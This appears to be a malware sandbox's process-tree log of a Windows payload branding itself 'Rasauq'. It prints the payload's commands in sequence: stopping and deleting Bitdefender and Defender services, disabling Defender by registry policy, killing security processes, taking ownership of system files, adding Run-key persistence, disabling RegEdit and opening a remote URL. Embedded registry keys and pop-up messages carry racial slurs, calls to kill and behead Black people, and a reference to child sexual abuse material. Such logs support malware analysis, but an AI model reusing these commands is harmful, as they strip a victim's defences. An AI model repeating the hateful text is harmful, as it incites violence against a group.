C:\Windows\system32\sc.exesc delete bdsubwiz4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop seccenter4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete seccenter4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop vsserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete vsserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop epssecurityservice4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete epssecurityservice4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete WinDefend4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete Sense4⤵
- Launches sc.exe
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MsMpEng.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MpCmdRun.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthSystray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM smartscreen.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f4⤵
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\notepad.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\calc.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\powercfg.exepowercfg /hibernate off REM Disables hibernation4⤵
- Power Settings
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in4⤵
- Power Settings
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-dc 0 REM Prevents sleep on battery4⤵
- Power Settings
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in4⤵
- Power Settings
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "Device Name"4⤵
- Power Settings
- Checks SCSI registry key(s)
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "USB Root Hub"4⤵
- Power Settings
- Checks SCSI registry key(s)
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f4⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCR\behead all niggers" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f4⤵
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f4⤵
- Adds Run key to start application
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k4⤵
-
C:\Windows\system32\reg.exereg query "HKU" /s /f "Software" /k5⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
-
-
C:\Windows\system32\reg.exereg add "End of search: 20 match(es) found.\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:3 "This machine has been compromised by Rasuaq"4⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f4⤵
- Disables RegEdit via registry modification
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f4,0x7ffbbb9bf208,0x7ffbbb9bf214,0x7ffbbb9bf2205⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1836,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:115⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2176,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:25⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2548,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2436 /prefetch:135⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3476,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:95⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4108,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4156,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:95⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4164,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3612,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5040 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5040,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3856,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5520,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5580,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5600 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=5732,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5708 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=5576,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6056,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6032 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6052,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6268 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6452,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6428 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6612,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6616,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6704 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7116,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7148,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7344 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7492,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7128 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7652,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8316,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8332 /prefetch:145⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11286⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8400,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8392 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7684,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8600 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8712 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8712 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=8840,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8824 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9016,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9060 /prefetch:15⤵
-
-
